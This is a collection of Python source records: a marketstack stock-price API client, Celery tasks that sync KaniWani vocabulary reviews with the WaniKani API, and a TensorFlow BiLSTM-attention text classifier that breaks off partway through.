{"seq_id":"627187685","text":"import configparser\nimport json\nimport requests\nimport datetime as d\n\n\ndef apicall(key: str, symbol: str, date_from: str, date_to: str, limit: int = 1) -> dict:\n    \"\"\"\n    Fetch end-of-day stock data from the marketstack API.\n\n    :param key: marketstack API access key\n    :param symbol: ticker symbol to query\n    :param date_from: start date (yyyy-mm-dd)\n    :param date_to: end date (yyyy-mm-dd)\n    :param limit: maximum number of records to return\n    :return: the parsed JSON response as a dict\n    \"\"\"\n    url = f'http://api.marketstack.com/v1/eod?access_key={key}&symbols={symbol}'\n\n    params = {\n        \"date_from\": date_from,\n        \"date_to\": date_to,\n        \"limit\": limit\n    }\n\n    res = requests.get(url, params=params)\n    if res.status_code != 200:\n        raise ConnectionRefusedError(\"Entered symbol or key is wrong\")\n\n    data = json.loads(res.text)\n    return data\n\n\n# UPDATE DATES TO GET NEW VALUES\n# CURRENT DATE -\ndate = d.datetime.now()\ndate = date.strftime(\"%Y-%m-%d\")\n# print(\"Today the date is:\", date)\n\n#Closing Date\n# today = d.date.today()\n# close_date = today - d.timedelta(days=1)\n# close_date = close_date.strftime(\"%Y-%m-%d\")\n# print(\"One day ago the date was CLOSE DATE:\", close_date)\n\n#Opening Date\n# open_date = today - d.timedelta(days=2)\n# open_date = open_date.strftime(\"%Y-%m-%d\")\n# print(\"Two days ago the date was OPEN DATE:\", open_date)\n\n#Safe 
Values\nopen_date = \"2021-05-01\"\nclose_date = \"2021-05-02\"\n# format - yyyy-mm-dd --- eg -> 2021-04-17\n\ndef getdata(symbol: str, date_from: str = open_date,\n date_to: str = close_date, **kwargs) -> list:\n \"\"\"\n\n :rtype: list\n :type date_to: object\n :param date_from: \n :param symbol:\n :param kwargs:\n :return list of values:\n \"\"\"\n values = []\n\n cfg: configparser.ConfigParser = configparser.ConfigParser()\n cfg.read('configuration.cfg')\n key = cfg.get(\"API KEY\", \"key\")\n\n data_list: list = apicall(key, symbol, date_from=date_from, date_to=date_to)[\"data\"]\n # print(data_list)\n if data_list:\n data_dict = data_list[0]\n\n else:\n raise ValueError(\"Entered dates are not correct\")\n\n for _, varg in kwargs.items():\n if varg in data_dict.keys():\n values.append(data_dict[varg])\n\n return values\n\n\nif __name__ == '__main__':\n symbol = \"GOOGL\"\n print(open_date, close_date)\n print(getdata(close='close', symbol=symbol,\n date_from=open_date, date_to=close_date))\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"281220720","text":"from __future__ import absolute_import\nimport logging\n\nfrom celery import shared_task\nfrom django.contrib.auth.models import User\nfrom django.db.models import F\nfrom django.db.models import Min\nfrom kw_webapp.wanikani import make_api_call\nfrom kw_webapp.wanikani import exceptions\nfrom kw_webapp import constants\nfrom kw_webapp.models import UserSpecific, Vocabulary, Profile, Level\nfrom datetime import timedelta, datetime\nfrom django.utils import timezone\nfrom async_messages import messages\n\nlogger = logging.getLogger('kw.tasks')\n\n\ndef past_time(hours_ago):\n \"\"\"\n Generates a datetime object X hours in the past.\n\n :param hours_ago: number of hours ago you'd like a datetime for\n :return: a datetime object indicting the time it was hours_ago hours ago.\n \"\"\"\n srs_level_hours = timedelta(hours=hours_ago)\n now = timezone.now()\n return now - srs_level_hours\n\n\n@shared_task\ndef all_srs(user=None):\n '''\n Task that performs an SRS update for users. Checks user current streak and last_reviewed_date in order to determine\n when the next review should be. If the time for the review is in the past, flag it for review for the user.\n\n :param user: Optional Param, the user to be updated. 
If left blank, will update all users.\n    :return: the number of reviews that were flagged as needing review.\n    '''\n    logger.info(\"Beginning SRS run for {}.\".format(user or \"all users\"))\n    affected_count = 0\n    for streak, srs_timing in constants.SRS_TIMES.items():\n        study_threshold = past_time(srs_timing)\n        if user and not user.profile.on_vacation:\n            review_set = UserSpecific.objects.filter(user=user,\n                                                     last_studied__lte=study_threshold,\n                                                     streak=streak,\n                                                     needs_review=False)\n        else:\n            review_set = UserSpecific.objects.filter(user__profile__on_vacation=False,\n                                                     last_studied__lte=study_threshold,\n                                                     streak=streak,\n                                                     needs_review=False)\n        if review_set.count() > 0:\n            logger.info(\n                \"{} has {} reviews for SRS level {}\".format((user or \"all users\"), review_set.count(), streak))\n            affected_count += review_set.update(needs_review=True)\n        else:\n            logger.info(\"{} has no reviews for SRS level {}\".format((user or \"all users\"), streak))\n\n    logger.info(\"Finished SRS run for {}.\".format(user or \"all users\"))\n    return affected_count\n\n\ndef get_vocab_by_meaning(meaning):\n    \"\"\"\n    Searches for a vocabulary object based on its meaning.\n\n    :param meaning: meaning to search for\n    :return: the vocabulary object; raises Vocabulary.DoesNotExist if no match is found\n    \"\"\"\n    try:\n        v = Vocabulary.objects.get(meaning=meaning)\n    except Vocabulary.DoesNotExist:\n        logger.error(\"While attempting to get vocabulary {} we could not find it!\".format(meaning))\n        raise Vocabulary.DoesNotExist(\"Couldn't find meaning: {}\".format(meaning))\n    else:\n        return v\n\n\ndef associate_vocab_to_user(vocab, user):\n    '''\n    takes a vocab, and creates a UserSpecific object for the user based on it. Returns the review and whether it was newly created.\n    :param vocab: the vocabulary object to associate to the user.\n    :param user: The user.\n    :return: a (review, created) tuple, or (None, None) if duplicate reviews already exist\n    '''\n    try:\n        review, created = UserSpecific.objects.get_or_create(vocabulary=vocab, user=user)\n        if created:\n            review.needs_review = True\n            review.next_review_date = timezone.now()\n            review.save()\n        return review, created\n\n    except UserSpecific.MultipleObjectsReturned:\n        us = UserSpecific.objects.filter(vocabulary=vocab, user=user)\n        for u in us:\n            logger.error(\n                \"during {}'s WK sync, we received multiple UserSpecific objects. Details: {}\".format(user.username,\n                                                                                                     u))\n        return None, None\n\n\ndef get_level_pages(levels):\n    page_size = 5\n    return [levels[i:i+page_size] for i in range(0, len(levels), page_size)]\n\n\ndef build_API_sync_string_for_user(user):\n    '''\n    Builds a vocabulary api string for the user which includes all relevant levels. 
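For illustration (hypothetical key), a user with levels 5, 6 and 7 unlocked would yield\n    \"https://www.wanikani.com/api/user/abc123/vocabulary/5,6,7\".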
Includes every level in the user's unlocked level list.\n\n    :param user: The user to have their vocab updated\n    :return: A fully formed and ready-to-request API string.\n    '''\n    api_call = \"https://www.wanikani.com/api/user/{}/vocabulary/\".format(user.profile.api_key)\n    # if the user has unlocked recent levels, check for new vocab on them as well.\n    levels = user.profile.unlocked_levels_list()\n    level_string = \",\".join(str(level) for level in levels) if isinstance(levels, list) else levels\n    api_call += level_string\n    return api_call\n\n\ndef build_API_sync_string_for_user_for_levels(user, levels):\n    '''\n    Given a user, build a vocabulary request string based on their api key, for a particular set of levels.\n    :param user: The related user.\n    :param levels: The level(s) of vocabulary we want to update; either a single level or a list.\n    :return: The fully formatted API string that will provide the vocabulary for those levels.\n    '''\n    level_string = \",\".join(str(level) for level in levels) if isinstance(levels, list) else levels\n    api_call = \"https://www.wanikani.com/api/user/{}/vocabulary/{}\".format(user.profile.api_key, level_string)\n    api_call += ','\n    return api_call\n\n\ndef lock_level_for_user(requested_level, user):\n    reviews = UserSpecific.objects.filter(user=user, vocabulary__readings__level=requested_level).distinct()\n    count = reviews.count()\n    reviews.delete()\n    level = Level.objects.get(profile=user.profile, level=requested_level)\n    user.profile.unlocked_levels.remove(level)\n    return count\n\n\ndef unlock_all_possible_levels_for_user(user):\n    \"\"\"\n\n    :param user: User to fully unlock.\n    :return: The list of levels unlocked, how many vocab were unlocked, how many vocab remain locked (as they are locked in WK)\n    \"\"\"\n    level_list = [level for level in range(1, user.profile.level + 1)]\n    unlocked, locked = unlock_eligible_vocab_from_levels(user, level_list)\n    return level_list, unlocked, locked\n\n\n@shared_task\ndef unlock_eligible_vocab_from_levels(user, levels):\n    \"\"\"\n    I don't like duplicating code like this, but it's for the purpose of reducing API call load on WaniKani. It's a hassle if the user caps out.\n    :param user: user to add vocab to.\n    :param levels: requested level unlock. This can also be a list.\n    :return: unlocked count, locked count\n    \"\"\"\n    unlocked = locked = 0\n\n    api_call_string = build_API_sync_string_for_user_for_levels(user, levels)\n\n    try:\n        response = make_api_call(api_call_string)\n        unlocked, locked = process_vocabulary_response_for_unlock(user, response)\n    except exceptions.InvalidWaniKaniKey:\n        logger.error(\"Invalid key found for user {}\".format(user.username))\n        user.profile.api_valid = False\n        user.profile.save()\n    except exceptions.WanikaniAPIException:\n        logger.error(\"Non-invalid key error found during API call. 
\")\n return unlocked, locked\n\n\ndef get_wanikani_level_by_api_key(api_key):\n api_string = \"https://www.wanikani.com/api/user/{}/user-information\".format(api_key)\n response = make_api_call(api_string)\n user_info = response[\"user_information\"]\n level = user_info[\"level\"]\n return level\n\n\n@shared_task\ndef sync_user_profile_with_wk(user):\n '''\n Hits the WK api with user information in order to synchronize user metadata such as level and gravatar information.\n\n :param user: The user to sync their profile with WK.\n :return: boolean indicating the success of the API call.\n '''\n api_string = \"https://www.wanikani.com/api/user/{}/user-information\".format(user.profile.api_key)\n\n try:\n json_data = make_api_call(api_string)\n except exceptions.InvalidWaniKaniKey:\n user.profile.api_valid = False;\n user.profile.save()\n return False\n\n user_info = json_data[\"user_information\"]\n user.profile.title = user_info[\"title\"]\n user.profile.join_date = datetime.utcfromtimestamp(user_info[\"creation_date\"])\n user.profile.topics_count = user_info[\"topics_count\"]\n user.profile.posts_count = user_info[\"posts_count\"]\n user.profile.about = user_info[\"about\"]\n user.profile.set_website(user_info[\"website\"])\n user.profile.set_twitter_account(user_info[\"twitter\"])\n user.profile.gravatar = user_info[\"gravatar\"]\n user.profile.last_wanikani_sync_date = timezone.now()\n user.profile.api_valid = True\n if user.profile.follow_me:\n user.profile.unlocked_levels.get_or_create(level=user_info[\"level\"])\n user.profile.handle_wanikani_level_change(user_info[\"level\"])\n\n user.profile.save()\n\n logger.info(\"Synced {}'s Profile.\".format(user.username))\n return True\n\n\n@shared_task\ndef sync_with_wk(user_id, full_sync=False):\n '''\n Takes a user. Checks the vocab list from WK for all levels. If anything new has been unlocked on the WK side,\n it also unlocks it here on Kaniwani and creates a new review for the user.\n\n :param user_id: id of the user to sync\n :param full_sync:\n :return: None\n '''\n # We split this into two seperate API calls as we do not necessarily know the current level until\n # For the love of god don't delete this next line\n user = User.objects.get(pk=user_id)\n logger.info(\"About to begin sync for user {}.\".format(user.username))\n profile_sync_succeeded = sync_user_profile_with_wk(user)\n if user.profile.api_valid:\n if not full_sync:\n new_review_count, new_synonym_count = sync_recent_unlocked_vocab_with_wk(user)\n else:\n new_review_count, new_synonym_count = sync_unlocked_vocab_with_wk(user)\n\n # Async messaging system.\n if new_review_count or new_synonym_count:\n logger.info(\"Sending message to front-end for user {}\".format(user.username))\n messages.success(user,\n \"Your Wanikani Profile has been synced. 
You have {} new reviews, and {} new synonyms\".format(\n                                 new_review_count, new_synonym_count))\n\n        return profile_sync_succeeded, new_review_count, new_synonym_count\n    else:\n        logger.warning(\n            \"Not attempting to sync, since API key is invalid, or user has indicated they do not want to be followed\")\n\n\ndef create_new_vocabulary(vocabulary_json):\n    '''\n    Creates a new vocabulary based on a json object provided by Wanikani and returns this vocabulary.\n    :param vocabulary_json: A JSON object representing a single vocabulary, as provided by Wanikani.\n    :return: The newly created Vocabulary object.\n    '''\n    kana_list = [reading.strip() for reading in\n                 vocabulary_json[\"kana\"].split(\",\")]  # Splits out multiple readings for one vocab.\n    meaning = vocabulary_json[\"meaning\"]\n    vocab = Vocabulary.objects.create(meaning=meaning)\n    vocab = associate_readings_to_vocab(vocab, vocabulary_json)\n    logger.info(\"Created new vocabulary with meaning {} and legal readings {}\".format(meaning, kana_list))\n    return vocab\n\n\ndef associate_readings_to_vocab(vocab, vocabulary_json):\n    kana_list = [reading.strip() for reading in\n                 vocabulary_json[\"kana\"].split(\",\")]  # Splits out multiple readings for one vocab.\n    character = vocabulary_json[\"character\"]\n    level = vocabulary_json[\"level\"]\n    for reading in kana_list:\n        new_reading, created = vocab.readings.get_or_create(kana=reading, character=character)\n        new_reading.level = level\n        new_reading.save()\n        if created:\n            logger.info(\"\"\"Created new reading: {}, level {}\n                        associated to vocab {}\"\"\".format(new_reading.kana, new_reading.level,\n                                                          new_reading.vocabulary.meaning))\n    return vocab\n\n\ndef get_or_create_vocab_by_json(vocab_json):\n    \"\"\"\n    if lookup by meaning fails, create a new vocab object and return it. 
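A minimal input sketch (fields inferred from the helpers above, values hypothetical):\n    {\"meaning\": \"one\", \"kana\": \"いち\", \"character\": \"一\", \"level\": 1}.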
See JSON Example here https://www.wanikani.com/api\n    :param vocab_json: a dictionary holding the information needed to create new vocabulary.\n    :return: the matching or newly created Vocabulary object.\n    \"\"\"\n    try:\n        vocab = get_vocab_by_meaning(vocab_json['meaning'])\n    except Vocabulary.DoesNotExist:\n        vocab = create_new_vocabulary(vocab_json)\n    return vocab\n\n\ndef add_synonyms_from_api_call_to_review(review, user_specific_json):\n    new_synonym_count = 0\n    if user_specific_json[\"user_synonyms\"] is None:\n        return review, new_synonym_count\n\n    for synonym in user_specific_json[\"user_synonyms\"]:\n        _, created = review.meaningsynonym_set.get_or_create(text=synonym)\n        if created:\n            new_synonym_count += 1\n    return review, new_synonym_count\n\n\ndef associate_synonyms_to_vocab(user, vocab, user_specific):\n    review = None\n    new_synonym_count = 0\n\n    try:\n        review = UserSpecific.objects.get(user=user, vocabulary=vocab)\n        _, new_synonym_count = add_synonyms_from_api_call_to_review(review, user_specific)\n    except UserSpecific.DoesNotExist:\n        pass\n\n    return review, new_synonym_count\n\n\ndef get_users_reviews(user):\n    if user.profile.only_review_burned:\n        return UserSpecific.objects.filter(user=user, wanikani_burned=True, hidden=False)\n    else:\n        return UserSpecific.objects.filter(user=user, hidden=False)\n\n\ndef get_users_current_reviews(user):\n    if user.profile.only_review_burned:\n        return UserSpecific.objects.filter(user=user,\n                                           needs_review=True,\n                                           wanikani_burned=True,\n                                           hidden=False,\n                                           burned=False)\n    else:\n        return UserSpecific.objects.filter(user=user,\n                                           needs_review=True,\n                                           hidden=False,\n                                           burned=False)\n\n\ndef get_users_future_reviews(user, time_limit=None):\n    if user.profile.only_review_burned:\n        queryset = UserSpecific.objects.filter(user=user,\n                                               needs_review=False,\n                                               wanikani_burned=True,\n                                               hidden=False,\n                                               burned=False).annotate(Min('next_review_date')).order_by(\n            'next_review_date')\n    else:\n        queryset = UserSpecific.objects.filter(user=user,\n                                               needs_review=False,\n                                               hidden=False,\n                                               burned=False).annotate(Min('next_review_date')).order_by(\n            'next_review_date')\n\n    if isinstance(time_limit, timedelta):\n        queryset = queryset.filter(next_review_date__lte=timezone.now() + time_limit)\n\n    return queryset\n\n\ndef process_vocabulary_response_for_unlock(user, json_data):\n    \"\"\"\n    Given a JSON Object from WK, iterate over the list of vocabulary, and synchronize the user.\n    :param user: the user to unlock vocabulary for\n    :param json_data: parsed vocabulary payload from the WK API\n    :return: (unlocked count, locked count)\n    \"\"\"\n    vocab_list = json_data['requested_information']\n    vocab_list = [vocab_json for vocab_json in vocab_list if\n                  vocab_json['user_specific'] is not None]  # filters out locked items.\n    unlocked = len(vocab_list)\n    locked = len(json_data['requested_information']) - unlocked\n    for vocabulary_json in vocab_list:\n        user_specific = vocabulary_json['user_specific']\n        vocab = get_or_create_vocab_by_json(vocabulary_json)\n        vocab = associate_readings_to_vocab(vocab, vocabulary_json)\n        new_review, created = associate_vocab_to_user(vocab, user)\n        new_review, synonyms_added_count = add_synonyms_from_api_call_to_review(new_review, user_specific)\n        new_review.wanikani_srs = user_specific[\"srs\"]\n        new_review.wanikani_srs_numeric = user_specific[\"srs_numeric\"]\n        new_review.wanikani_burned = user_specific[\"burned\"]\n        new_review.save()\n    logger.info(\"Unlocking level for {}\".format(user.username))\n    return unlocked, locked\n\n\ndef process_vocabulary_response_for_user(user, json_data):\n    \"\"\"\n    Given parsed JSON data from WK, iterate over the list of vocabulary, and synchronize the user.\n    :param 
json_data: parsed vocabulary payload from the WK API\n    :param user: the user whose reviews should be synchronized\n    :return: a (new_review_count, new_synonym_count) tuple\n    \"\"\"\n    new_review_count = 0\n    new_synonym_count = 0\n    vocab_list = json_data['requested_information']\n    vocab_list = [vocab_json for vocab_json in vocab_list if\n                  vocab_json['user_specific'] is not None]  # filters out locked items.\n    for vocabulary_json in vocab_list:\n        user_specific = vocabulary_json['user_specific']\n        vocab = get_or_create_vocab_by_json(vocabulary_json)\n        vocab = associate_readings_to_vocab(vocab, vocabulary_json)\n        if user.profile.follow_me:\n            new_review, created = associate_vocab_to_user(vocab, user)\n            if created:\n                new_review_count += 1\n            new_review, synonyms_added_count = add_synonyms_from_api_call_to_review(new_review, user_specific)\n            new_synonym_count += synonyms_added_count\n        else:  # User does not want to be followed, so we prevent creation of new vocab, and sync only synonyms instead.\n            new_review, synonyms_added_count = associate_synonyms_to_vocab(user, vocab, user_specific)\n            new_synonym_count += synonyms_added_count\n        if new_review:\n            new_review.wanikani_srs = user_specific[\"srs\"]\n            new_review.wanikani_srs_numeric = user_specific[\"srs_numeric\"]\n            new_review.wanikani_burned = user_specific[\"burned\"]\n            new_review.save()\n    logger.info(\"Synced Vocabulary for {}\".format(user.username))\n    return new_review_count, new_synonym_count\n\n\ndef sync_recent_unlocked_vocab_with_wk(user):\n    if user.profile.unlocked_levels_list():\n        levels = [level for level in range(user.profile.level - 2, user.profile.level + 1) if\n                  level in user.profile.unlocked_levels_list()]\n        if levels:\n            request_string = build_API_sync_string_for_user_for_levels(user, levels)\n            json_data = make_api_call(request_string)\n            new_review_count, new_synonym_count = process_vocabulary_response_for_user(user, json_data)\n            return new_review_count, new_synonym_count\n    return 0, 0\n\n\ndef sync_unlocked_vocab_with_wk(user):\n    if user.profile.unlocked_levels_list():\n        pages = get_level_pages(user.profile.unlocked_levels_list())\n        new_review_count = new_synonym_count = 0\n        for page in pages:\n            request_string = build_API_sync_string_for_user_for_levels(user, page)\n            logger.info(\"Creating sync string for user {}: {}\".format(user.username, user.profile.api_key))\n            response = make_api_call(request_string)\n            current_page_review_count, current_page_synonym_count = process_vocabulary_response_for_user(user, response)\n            new_review_count += current_page_review_count\n            new_synonym_count += current_page_synonym_count\n        return new_review_count, new_synonym_count\n    else:\n        return 0, 0\n\n\n@shared_task\ndef sync_all_users_to_wk():\n    '''\n    calls sync_with_wk for every user who has visited within the last week, causing them to have their newly unlocked vocabulary synchronized to KW.\n\n    :return: the number of users queued for a sync with WK.\n    '''\n    one_week_ago = past_time(24 * 7)\n    logger.info(\"Beginning Bi-daily Sync for all users!\")\n    users = User.objects.all().exclude(profile__isnull=True)\n    logger.info(\"Original sync would have occurred for {} users.\".format(users.count()))\n    users = User.objects.filter(profile__last_visit__gte=one_week_ago)\n    logger.info(\"Sync will occur for {} users.\".format(users.count()))\n    affected_count = 0\n    for user in users:\n        logger.debug(\"{} --- {} --- {}\".format(user.username, user.profile.last_visit, one_week_ago))\n        sync_with_wk.delay(user.id, full_sync=True)\n        affected_count += 1\n    return affected_count\n\n\n@shared_task\ndef repopulate():\n    '''\n    A task that uses my personal API key in order to re-sync the database. 
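It walks every level from constants.LEVEL_MIN to constants.LEVEL_MAX and upserts each vocabulary item.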
Koichi often decides to switch things around\n    on a level-per-level basis, or add synonyms, or change which readings are allowed. This method attempts to synchronize\n    our data sets.\n\n    :return:\n    '''\n    url = \"https://www.wanikani.com/api/user/\" + constants.API_KEY + \"/vocabulary/{}\"\n    logger.info(\"Starting DB Repopulation from WaniKani\")\n    for level in range(constants.LEVEL_MIN, constants.LEVEL_MAX + 1):\n        json_data = make_api_call(url.format(level))\n        vocabulary_list = json_data['requested_information']\n        for vocabulary in vocabulary_list:\n            sync_single_vocabulary_item_by_json(vocabulary)\n\n\ndef sync_single_vocabulary_item_by_json(vocabulary_json):\n    meaning = vocabulary_json[\"meaning\"]\n    new_vocab, created = Vocabulary.objects.get_or_create(meaning=meaning)\n    associate_readings_to_vocab(new_vocab, vocabulary_json)\n    if created:\n        logger.info(\"Found new Vocabulary item from WaniKani:{}\".format(new_vocab.meaning))\n\n\ndef pull_user_synonyms_by_level(user, level):\n    '''\n    Retrieves vocabulary list from the WK API, specifically searching to pull in synonyms.\n\n    :param user: User to pull WK synonyms for\n    :param level: The level for synonyms that should be pulled\n    :return: None\n    '''\n    request_string = build_API_sync_string_for_user_for_levels(user, level)\n    json_data = make_api_call(request_string)\n    try:\n        vocabulary_list = json_data['requested_information']\n        for vocabulary in vocabulary_list:\n            meaning = vocabulary[\"meaning\"]\n            if vocabulary['user_specific'] and vocabulary['user_specific']['user_synonyms']:\n                try:\n                    review = UserSpecific.objects.get(user=user, vocabulary__meaning=meaning)\n                    for synonym in vocabulary['user_specific']['user_synonyms']:\n                        review.meaningsynonym_set.get_or_create(text=synonym)\n                    review.save()\n                except UserSpecific.DoesNotExist as e:\n                    logger.error(\"Couldn't pull review during a synonym sync: {}\".format(e))\n                except KeyError as e:\n                    logger.error(\"No user_specific or synonyms?: {}\".format(json_data))\n                except UserSpecific.MultipleObjectsReturned:\n                    reviews = UserSpecific.objects.filter(user=user, vocabulary__meaning=meaning)\n                    for review in reviews:\n                        logger.error(\n                            \"Found something janky! Multiple reviews under 1 vocab meaning?!?: {}\".format(\n                                review))\n    except KeyError:\n        logger.error(\"NO requested info?: {}\".format(json_data))\n\n\ndef pull_all_user_synonyms(user=None):\n    '''\n    Syncs up the user's synonyms for WK for all levels that they have currently unlocked.\n\n    :param user: The user to pull all synonyms for\n    :return: None\n    '''\n    if user:\n        for level in user.profile.unlocked_levels_list():\n            pull_user_synonyms_by_level(user, level)\n        logger.info(\"Pulled user synonyms for {}\".format(user.username))\n    else:\n        for profile in Profile.objects.all():\n            if len(profile.api_key) == 32:\n                user = profile.user\n                for level in profile.unlocked_levels_list():\n                    pull_user_synonyms_by_level(user, level)\n                logger.info(\"Pulled user synonyms for {}\".format(user.username))\n\n\ndef user_returns_from_vacation(user):\n    \"\"\"\n    Called when a user disables vacation mode. 
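The timestamp shift below uses F() expressions, so it runs as bulk UPDATE queries.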
A one-time pass through their reviews corrects their last_studied timestamps, and a quick SRS run then determines which reviews currently need to be looked at.\n    \"\"\"\n    logger.info(\"{} has returned from vacation!\".format(user.username))\n    vacation_date = user.profile.vacation_date\n    if vacation_date:\n        users_reviews = UserSpecific.objects.filter(user=user, burned=False)\n        elapsed_vacation_time = timezone.now() - vacation_date\n        updated_count = users_reviews.update(last_studied=F('last_studied') + elapsed_vacation_time)\n        users_reviews.update(next_review_date=F('next_review_date') + elapsed_vacation_time)\n        logger.info(\"brought {} reviews out of hibernation for {}\".format(updated_count, user.username))\n        logger.info(\"User {} has been gone for timedelta: {}\".format(user.username, str(elapsed_vacation_time)))\n    user.profile.vacation_date = None\n    user.profile.on_vacation = False\n    user.profile.save()\n    all_srs(user)\n","sub_path":"kw_webapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":24954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"502568031","text":"import tensorflow as tf\nfrom .attention import attention\n\n\nclass Model(object):\n    def __init__(self, config,vectors):\n        self.max_num_sents = config.max_num_sents\n        self.max_sent_length = config.max_sent_length\n        self.num_classes = config.num_classes - 1\n        self.num_simlar_docs = config.num_simlar_docs\n        self.similarity_text_field_names = config.similarity_text_field_names\n        self.num_concepts = config.num_concepts\n        self.concept_dimesions = config.concept_dimesions\n        self.vectors = vectors\n        self.word_embedding_size = config.word_embedding_size\n        self.filter_sizes = config.filter_sizes\n        self.num_filters = config.num_filters\n        self.num_rnn_units = config.num_rnn_units\n        self.attention_size = config.attention_size\n        self.rnn_output_keep_prob = config.rnn_output_keep_prob\n        self.text_field_names = config.text_field_names\n        self.use_loss = config.use_loss\n        self.threshold = config.threshold\n        self.l2_reg_lambda = config.l2_reg_lambda\n        #self.use_noise = config.use_noise\n        self.input_doc = []\n        self.doc_actual_num_sents = []\n        self.doc_actual_sent_lengths = []\n        self.similar_docs = []\n        self.similar_doc_actual_num_sents = []\n        self.similar_doc_actual_sent_lengths = []\n        for name in self.text_field_names:\n            self.input_doc.append(tf.placeholder(tf.int32, [None, self.max_num_sents[name], self.max_sent_length[name]], name=name + '_input_doc'))\n            self.doc_actual_num_sents.append(tf.placeholder(tf.int32, [None], name=name + '_doc_actual_num_sents'))\n            self.doc_actual_sent_lengths.append(tf.placeholder(tf.int32, [None, self.max_num_sents[name]], name=name + '_doc_actual_sent_lengths'))\n            self.similar_docs.append(tf.placeholder(tf.int32, [None, self.num_simlar_docs, self.max_num_sents[name],\n                                                   self.max_sent_length[name]],name=name + '_similar_docs'))\n            self.similar_doc_actual_num_sents.append(\n                tf.placeholder(tf.int32, [None, self.num_simlar_docs], name=name + '_similar_doc_actual_num_sents'))\n            self.similar_doc_actual_sent_lengths.append(tf.placeholder(tf.int32, [None, self.num_simlar_docs, self.max_num_sents[name]], name=name + '_similar_doc_actual_sent_lengths'))\n\n        self.input_cls = tf.placeholder(tf.float32, [None,self.num_classes], name='input_cls')\n        self.cnn_dropout_keep_prob = tf.placeholder_with_default(1.0,[], name='cnn_dropout_keep_prob')\n        self.attention_keep_prob = tf.placeholder_with_default(1.0,[], name='attention_keep_prob')\n        
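# note: the next placeholder deliberately overwrites the config value read above,\n        # so the keep prob can be fed per run (the 1.0 default disables dropout at eval time)\n        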
self.rnn_output_keep_prob = tf.placeholder_with_default(1.0,[],name='rnn_output_keep_prob')\n        self.attention_loss = tf.constant(0.0)\n        self.l2_loss = tf.constant(0.0)\n        self.fine_tune_word_embedding=config.fine_tune_word_embedding\n\n        self.wv_initial = tf.constant(self.vectors, dtype=tf.float32)\n\n    def add_embedding_layer(self,input):\n\n\n        # Embedding layer\n        with tf.variable_scope('embedding',reuse=tf.AUTO_REUSE):\n            wordVectors = tf.get_variable('word_vectors', initializer=self.wv_initial,trainable=self.fine_tune_word_embedding)\n            embedded_words = tf.nn.embedding_lookup(wordVectors, input)\n        return embedded_words\n\n\n    def add_bilstm_layer(self,input,actual_length,scope):\n        #rnn context\n        with tf.variable_scope('bilstm_' + scope, reuse=tf.AUTO_REUSE):\n            lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(self.num_rnn_units, forget_bias=1.0)\n            print('fw cell',lstm_fw_cell)\n            lstm_fw_cell = tf.contrib.rnn.DropoutWrapper(cell=lstm_fw_cell, output_keep_prob=self.rnn_output_keep_prob)\n            lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(self.num_rnn_units, forget_bias=1.0)\n            print('bw cell',lstm_bw_cell)\n            lstm_bw_cell = tf.contrib.rnn.DropoutWrapper(cell=lstm_bw_cell, output_keep_prob=self.rnn_output_keep_prob)\n\n            bilstm_outputs, _ = tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell, lstm_bw_cell, input,\n                                                            actual_length, dtype=tf.float32)\n        return bilstm_outputs\n    def add_attention_layer(self,input, scope):\n        with tf.name_scope('attention_layer_' + scope):\n            attention_output, alphas = attention(input, self.attention_size, return_alphas=True)\n            tf.summary.histogram('alphas', alphas)\n            attention_output = tf.nn.dropout(attention_output, self.attention_keep_prob)\n        return attention_output\n\n    def sentence_features(self,input,actual_length):\n\n        #sentence_input = tf.reshape(input,[-1,self.max_sent_length,self.word_embedding_size])\n        sentence_bilstm_output = self.add_bilstm_layer(input,actual_length,'sent')\n        sentence_features = self.add_attention_layer(sentence_bilstm_output,'sent')\n        return sentence_features,2 * self.num_rnn_units\n    def mask_sequence(self,input,max_length, input_actual_num,last_dimesion_size):\n\n        mask = tf.to_float(tf.sequence_mask(input_actual_num, max_length))\n        #print('input',input.get_shape())\n        #print('mask',mask.get_shape())\n        mask = tf.tile(tf.expand_dims(mask,-1),[1,1,last_dimesion_size])\n        self.mask_shape = tf.shape(mask)\n        masked = input * mask\n        return masked\n    def doc_features(self,input,actual_num_sents):\n\n        doc_bilstm_output,_ = self.add_bilstm_layer(input,actual_num_sents,'doc')\n        doc_features = self.add_attention_layer(doc_bilstm_output, 'doc')\n        return doc_features\n        #print('doc_features',self.doc_features.get_shape())\n\n    #def mask(self, input):\n\n    def add_fc_layer(self, input, input_size, output_size, scope):\n\n        #self.feature = self.cnn_drop\n        with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n            W = tf.get_variable(\n                'W',\n                shape=[input_size, output_size],\n                initializer=tf.contrib.layers.xavier_initializer())\n            b = tf.get_variable(name='b', initializer=tf.constant(0.1, shape=[output_size]))\n            vectors = tf.nn.xw_plus_b(input, W, b, name='scores')\n        return vectors, W, b\n\n    def make_prediction(self,probabilities,threshold):\n        pred = tf.where(tf.greater(probabilities,threshold),tf.ones_like(probabilities,dtype=tf.float32),tf.zeros_like(probabilities,dtype=tf.float32))\n        predictions = tf.identity(tf.reduce_sum(pred,axis = 1) - 1,name='predictions')\n        return predictions\n    def _doc_prediction(self,input,input_size,num_classes,scope):\n        scores, W, b = self.add_fc_layer(input, 
